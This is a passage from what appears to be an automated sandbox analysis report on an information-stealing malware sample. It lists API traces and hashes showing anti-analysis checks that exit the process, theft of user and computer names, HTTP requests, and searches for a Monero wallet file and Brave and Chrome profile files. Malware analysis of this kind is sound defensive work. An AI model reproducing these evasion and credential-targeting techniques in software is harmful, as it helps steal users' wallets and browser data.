                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: c3e9a478c648378906fb9dbc94b7c97825d66a0a82ed5c01c8936ac79f396bf3
                            • Instruction ID: 03ec4cd21dd437ab464e0d6acc18068aa7674c7eb7794b1445c382318068ef74
                            • Opcode Fuzzy Hash: c3e9a478c648378906fb9dbc94b7c97825d66a0a82ed5c01c8936ac79f396bf3
                            • Instruction Fuzzy Hash: 78512AB5A1420AEFDF06DFA0D954ABE7BB9BF44704F108048E406BB240D771ED55DBA2

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1124 397500-39754a GetWindowsDirectoryA 1125 39754c 1124->1125 1126 397553-3975c7 GetVolumeInformationA call 398d00 * 3 1124->1126 1125->1126 1133 3975d8-3975df 1126->1133 1134 3975fc-397617 GetProcessHeap RtlAllocateHeap 1133->1134 1135 3975e1-3975fa call 398d00 1133->1135 1137 397619-397626 call 39a740 1134->1137 1138 397628-397658 wsprintfA call 39a740 1134->1138 1135->1133 1145 39767e-39768e 1137->1145 1138->1145
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00397542
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0039757F
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00397603
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0039760A
                            • wsprintfA.USER32 ref: 00397640
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                            • String ID: :$C$\$:
                            • API String ID: 1544550907-1412321837
                            • Opcode ID: 741796597e30412a01a4f310c777f1c855247012c46c28d6e023d593188b5bce
                            • Instruction ID: 61c188e0507cf1b58587fabe839c859a9a09381a3f544cb2e4be1d17dd3b4d98
                            • Opcode Fuzzy Hash: 741796597e30412a01a4f310c777f1c855247012c46c28d6e023d593188b5bce
                            • Instruction Fuzzy Hash: 1041C2B1D04248ABDF11DF94CC45FEEBBB8EF18704F100198F509AB280D7786A48CBA5

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,011521E8), ref: 003998A1
                              • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,01152458), ref: 003998BA
                              • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,01152188), ref: 003998D2
                              • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,01152200), ref: 003998EA
                              • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,011522A8), ref: 00399903
                              • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,011590B0), ref: 0039991B
                              • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,011453F0), ref: 00399933
                              • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,01145330), ref: 0039994C
                              • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,01152218), ref: 00399964
                              • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,01152278), ref: 0039997C
                              • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,01152230), ref: 00399995
                              • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,01152248), ref: 003999AD
                              • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,01145550), ref: 003999C5
                              • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,01152260), ref: 003999DE
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 003811D0: ExitProcess.KERNEL32 ref: 00381211
                              • Part of subcall function 00381160: GetSystemInfo.KERNEL32(?), ref: 0038116A
                              • Part of subcall function 00381160: ExitProcess.KERNEL32 ref: 0038117E
                              • Part of subcall function 00381110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0038112B
                              • Part of subcall function 00381110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00381132
                              • Part of subcall function 00381110: ExitProcess.KERNEL32 ref: 00381143
                              • Part of subcall function 00381220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0038123E
                              • Part of subcall function 00381220: __aulldiv.LIBCMT ref: 00381258
                              • Part of subcall function 00381220: __aulldiv.LIBCMT ref: 00381266
                              • Part of subcall function 00381220: ExitProcess.KERNEL32 ref: 00381294
                              • Part of subcall function 00396770: GetUserDefaultLangID.KERNEL32 ref: 00396774
                              • Part of subcall function 00381190: ExitProcess.KERNEL32 ref: 003811C6
                              • Part of subcall function 00397850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003811B7), ref: 00397880
                              • Part of subcall function 00397850: RtlAllocateHeap.NTDLL(00000000), ref: 00397887
                              • Part of subcall function 00397850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0039789F
                              • Part of subcall function 003978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00397910
                              • Part of subcall function 003978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00397917
                              • Part of subcall function 003978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0039792F
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,011590D0,?,003A110C,?,00000000,?,003A1110,?,00000000,003A0AEF), ref: 00396ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00396AE8
                            • CloseHandle.KERNEL32(00000000), ref: 00396AF9
                            • Sleep.KERNEL32(00001770), ref: 00396B04
                            • CloseHandle.KERNEL32(?,00000000,?,011590D0,?,003A110C,?,00000000,?,003A1110,?,00000000,003A0AEF), ref: 00396B1A
                            • ExitProcess.KERNEL32 ref: 00396B22
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                            • String ID:
                            • API String ID: 2525456742-0
                            • Opcode ID: 27af73ac4d39da96a77751ef4b45f2d6afef33cd0f1e3cc20447df60f4fdef43
                            • Instruction ID: 6b975b890f711220085b75eb5934f116fec582bc0825cb981adddc13a7922dc3
                            • Opcode Fuzzy Hash: 27af73ac4d39da96a77751ef4b45f2d6afef33cd0f1e3cc20447df60f4fdef43
                            • Instruction Fuzzy Hash: 99310971914609AADF06FBF0DC5BFEE7B78AF14740F104618F202AA192EF706905D7A2

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1204 381220-381247 call 3989b0 GlobalMemoryStatusEx 1207 381249-381271 call 39da00 * 2 1204->1207 1208 381273-38127a 1204->1208 1209 381281-381285 1207->1209 1208->1209 1211 38129a-38129d 1209->1211 1212 381287 1209->1212 1215 381289-381290 1212->1215 1216 381292-381294 ExitProcess 1212->1216 1215->1211 1215->1216
                            APIs
                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0038123E
                            • __aulldiv.LIBCMT ref: 00381258
                            • __aulldiv.LIBCMT ref: 00381266
                            • ExitProcess.KERNEL32 ref: 00381294
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 3404098578-2766056989
                            • Opcode ID: b2706110bd2cd010f571cc973cb9ca4553c5fd51bacff6fe71d9c0944b421779
                            • Instruction ID: ce109f179e5ec50dfda1f623d6167f2db447040788b458c7ffd1962a41807aca
                            • Opcode Fuzzy Hash: b2706110bd2cd010f571cc973cb9ca4553c5fd51bacff6fe71d9c0944b421779
                            • Instruction Fuzzy Hash: 0E011DB0D44308BAEF11EBE4DC4AF9EBB7CAB14705F208488F705BA2C0D7B455468799

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1218 396af3 1219 396b0a 1218->1219 1221 396aba-396ad7 call 39aad0 OpenEventA 1219->1221 1222 396b0c-396b22 call 396920 call 395b10 CloseHandle ExitProcess 1219->1222 1227 396ad9-396af1 call 39aad0 CreateEventA 1221->1227 1228 396af5-396b04 CloseHandle Sleep 1221->1228 1227->1222 1228->1219
                            APIs
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,011590D0,?,003A110C,?,00000000,?,003A1110,?,00000000,003A0AEF), ref: 00396ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00396AE8
                            • CloseHandle.KERNEL32(00000000), ref: 00396AF9
                            • Sleep.KERNEL32(00001770), ref: 00396B04
                            • CloseHandle.KERNEL32(?,00000000,?,011590D0,?,003A110C,?,00000000,?,003A1110,?,00000000,003A0AEF), ref: 00396B1A
                            • ExitProcess.KERNEL32 ref: 00396B22
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                            • String ID:
                            • API String ID: 941982115-0
                            • Opcode ID: cff3c0624422e0c828212ff853bec0222643be9130b2354f78961ee07c3b8749
                            • Instruction ID: d75eb4653aa9644ed1ff582760f580b8f72ad07815b67461fbabed725ef43d0f
                            • Opcode Fuzzy Hash: cff3c0624422e0c828212ff853bec0222643be9130b2354f78961ee07c3b8749
                            • Instruction Fuzzy Hash: ABF05E70944609AFEF02ABA0DC0BBBE7B78FB14745F104514B503A51C1DBB05544E696

                            Control-flow Graph

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00384839
                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00384849
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1274457161-4251816714
                            • Opcode ID: 0c14049725591733b208f835eff477e33c638af3601789e59d69f94055cabaf4
                            • Instruction ID: 0c6ff6699bc04081a51feda7fa4cb2fe9df4601de9bd503169c0f435ac2a896f
                            • Opcode Fuzzy Hash: 0c14049725591733b208f835eff477e33c638af3601789e59d69f94055cabaf4
                            • Instruction Fuzzy Hash: CF214FB1D00209ABDF14DFA4E845ADE7B74FB44320F108625F915AB2C1EB706A09CF91

                            Control-flow Graph

                            APIs
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                              • Part of subcall function 00386280: InternetOpenA.WININET(003A0DFE,00000001,00000000,00000000,00000000), ref: 003862E1
                              • Part of subcall function 00386280: StrCmpCA.SHLWAPI(?,0115E828), ref: 00386303
                              • Part of subcall function 00386280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00386335
                              • Part of subcall function 00386280: HttpOpenRequestA.WININET(00000000,GET,?,0115DFC8,00000000,00000000,00400100,00000000), ref: 00386385
                              • Part of subcall function 00386280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003863BF
                              • Part of subcall function 00386280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003863D1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00395228
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                            • String ID: ERROR$ERROR
                            • API String ID: 3287882509-2579291623
                            • Opcode ID: a3e1f226786c0d4bc0337cb1837cb013e00d495bf40278b576f13dcf26b2c28d
                            • Instruction ID: 052276dff5a865f1fb954c1536b1e3adc98f4af3277d83199dd00dc6c13743d6
                            • Opcode Fuzzy Hash: a3e1f226786c0d4bc0337cb1837cb013e00d495bf40278b576f13dcf26b2c28d
                            • Instruction Fuzzy Hash: 42112E30910908ABDF16FFA0DD52AED7778AF50300F404668F80A4E592EF30AB06D7D1

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1275 3978e0-397937 GetProcessHeap RtlAllocateHeap GetComputerNameA 1276 397939-39793e 1275->1276 1277 397942-397945 1275->1277 1278 397962-397972 1276->1278 1277->1278
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00397910
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00397917
                            • GetComputerNameA.KERNEL32(?,00000104), ref: 0039792F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: b88e71bd35f9420ff54de30a18d923b90be08e06d5eb259c29cb01ec023c1b37
                            • Instruction ID: cac7a1c82624b38a6a81dfcb686bc9929629d5b56be2a2bbc03b2e0cf905f59d
                            • Opcode Fuzzy Hash: b88e71bd35f9420ff54de30a18d923b90be08e06d5eb259c29cb01ec023c1b37
                            • Instruction Fuzzy Hash: 6D0181B1A04608EFDB10DF98DD45FAABBBCFB04B25F10421AFA45E3680C37459048BA1
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0038112B
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 00381132
                            • ExitProcess.KERNEL32 ref: 00381143
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$AllocCurrentExitNumaVirtual
                            • String ID:
                            • API String ID: 1103761159-0
                            • Opcode ID: 48ba17fc91330bdd96ad2554df90a749fd9ff9b6a831b1a6685eb97311b15926
                            • Instruction ID: 49d6df66046bdaecfbbe25769b155e9e1caaf95d34808bc747af206903a0a5d2
                            • Opcode Fuzzy Hash: 48ba17fc91330bdd96ad2554df90a749fd9ff9b6a831b1a6685eb97311b15926
                            • Instruction Fuzzy Hash: C7E0E6B094534CFFE7106BA09C0EF097ABCEB14B05F204094F7097A1D0D6B52A45A799
                            APIs
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 003810B3
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 003810F7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: cd44674056fc2f07052030c4508d9d01ba6e53de6d019f04f94cea1702393ec4
                            • Instruction ID: 800b4a40c9547ab6f1e1073f157625b3221e36e6bfdd8a86ae83dda1e318d047
                            • Opcode Fuzzy Hash: cd44674056fc2f07052030c4508d9d01ba6e53de6d019f04f94cea1702393ec4
                            • Instruction Fuzzy Hash: D4F0E2B1641308BBEB14ABA4AC49FAAB7ECE705B15F300448F504E7280D5729E04DBA0
                            APIs
                              • Part of subcall function 003978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00397910
                              • Part of subcall function 003978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00397917
                              • Part of subcall function 003978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0039792F
                              • Part of subcall function 00397850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003811B7), ref: 00397880
                              • Part of subcall function 00397850: RtlAllocateHeap.NTDLL(00000000), ref: 00397887
                              • Part of subcall function 00397850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0039789F
                            • ExitProcess.KERNEL32 ref: 003811C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AllocateName$ComputerExitUser
                            • String ID:
                            • API String ID: 3550813701-0
                            • Opcode ID: 6b55e9db2ca6386421c13d07d61fc5bab87c4f48a2e3e8f631e12406ec8e050c
                            • Instruction ID: efc716be42fc1c0b06f9ace52067a309b9967597a2243c0c3a881fe42a4a6437
                            • Opcode Fuzzy Hash: 6b55e9db2ca6386421c13d07d61fc5bab87c4f48a2e3e8f631e12406ec8e050c
                            • Instruction Fuzzy Hash: 49E012B592430557CE0173B0AC0FF2A379C9B6534DF040465FA05D6142FA25E805966A
                            APIs
                            • wsprintfA.USER32 ref: 003938CC
                            • FindFirstFileA.KERNEL32(?,?), ref: 003938E3
                            • lstrcat.KERNEL32(?,?), ref: 00393935
                            • StrCmpCA.SHLWAPI(?,003A0F70), ref: 00393947
                            • StrCmpCA.SHLWAPI(?,003A0F74), ref: 0039395D
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00393C67
                            • FindClose.KERNEL32(000000FF), ref: 00393C7C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 1125553467-2524465048
                            • Opcode ID: 95438b918410391c9fea37fc71eca75ad884f2caf3625aa7025e69796e9bc87c
                            • Instruction ID: c3a8975c45701afbfdd6477c2a058f95b87eed1f78da8170ee7784bcb7b6a0c3
                            • Opcode Fuzzy Hash: 95438b918410391c9fea37fc71eca75ad884f2caf3625aa7025e69796e9bc87c
                            • Instruction Fuzzy Hash: E5A140B19006089FDF25DFA4DC85FEA7778FB59304F044588E60DA6141EB759B88CFA2
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • FindFirstFileA.KERNEL32(00000000,?,003A0B32,003A0B2B,00000000,?,?,?,003A13F4,003A0B2A), ref: 0038BEF5
                            • StrCmpCA.SHLWAPI(?,003A13F8), ref: 0038BF4D
                            • StrCmpCA.SHLWAPI(?,003A13FC), ref: 0038BF63
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0038C7BF
                            • FindClose.KERNEL32(000000FF), ref: 0038C7D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 3334442632-726946144
                            • Opcode ID: e9bc892d8442f81ffbfcf2cce85dced2ab5c2a07976f6540101f54c1097526a1
                            • Instruction ID: acfa79fac32e22a3d3e9d850a189269070a2ba84c4ec9f30890168540800bc32
                            • Opcode Fuzzy Hash: e9bc892d8442f81ffbfcf2cce85dced2ab5c2a07976f6540101f54c1097526a1
                            • Instruction Fuzzy Hash: BA4255729106089BDF16FBB0DD96EED777DAB54300F404698F50A9A081EF349B49CBE2
                            APIs
                            • wsprintfA.USER32 ref: 0039492C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00394943
                            • StrCmpCA.SHLWAPI(?,003A0FDC), ref: 00394971
                            • StrCmpCA.SHLWAPI(?,003A0FE0), ref: 00394987
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00394B7D
                            • FindClose.KERNEL32(000000FF), ref: 00394B92
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
